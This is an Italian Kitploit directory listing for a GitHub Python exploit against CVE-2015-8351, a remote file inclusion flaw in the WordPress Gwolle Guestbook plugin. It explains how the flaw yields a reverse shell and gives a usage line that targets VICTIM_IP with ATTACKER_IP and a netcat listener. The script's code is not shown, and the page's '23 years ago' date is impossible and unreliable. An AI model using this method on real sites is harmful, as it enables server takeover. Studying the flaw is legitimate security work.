Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
exploit-CVE-2015-8351 — Plugin WordPress Gwolle Guestbook 1.5.3 - Inclusione remota di file | Kitploit
Strumenti/GitHubGitHub/g4sp4rcs/exploit-cve-2015-8351
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubg4sp4rcs/exploit-cve-2015-8351

exploit-CVE-2015-8351

Plugin WordPress Gwolle Guestbook 1.5.3 - Inclusione remota di file

Vedi Repository
23 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit RFI per il Plugin WordPress Gwolle Guestbook

Questo script Python sfrutta una vulnerabilità critica di Remote File Inclusion (RFI) nel plugin WordPress Gwolle Guestbook, che può essere sfruttata da un attaccante non autenticato per includere un file PHP remoto ed eseguire codice arbitrario sul sistema vulnerabile.

Dettagli della vulnerabilità

Il parametro "abspath" della richiesta HTTP GET non viene adeguatamente sanitizzato prima di essere utilizzato nella funzione PHP require(). Un attaccante remoto può includere un file chiamato 'wp-load.php' da un server remoto arbitrario ed eseguirne il contenuto sul server web vulnerabile. Per fare ciò, l'attaccante deve inserire un file 'wp-load.php' dannoso nella document root del proprio server e includere l'URL del server nella richiesta.

Lo sfruttamento riuscito di questa vulnerabilità può portare alla compromissione dell'intera installazione WordPress e può persino portare alla compromissione dell'intero server web.

Utilizzo

Lo script richiede tre argomenti:

  • URL del target: l'URL dell'installazione WordPress vulnerabile.
  • Host dell'attaccante: l'indirizzo IP o il nome host della macchina dell'attaccante.
  • Porta dell'attaccante: il numero di porta su cui l'attaccante è in ascolto per una shell inversa.

Esempio:

root@kitploit:~
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORT

Nota: è necessario avere un listener netcat aperto sulla macchina dell'attaccante sulla porta specificata.

Esclusione di responsabilità

Questo script è fornito solo a scopo didattico. L'autore non è responsabile per eventuali danni causati dall'uso improprio di questo script.

Scarica lo strumento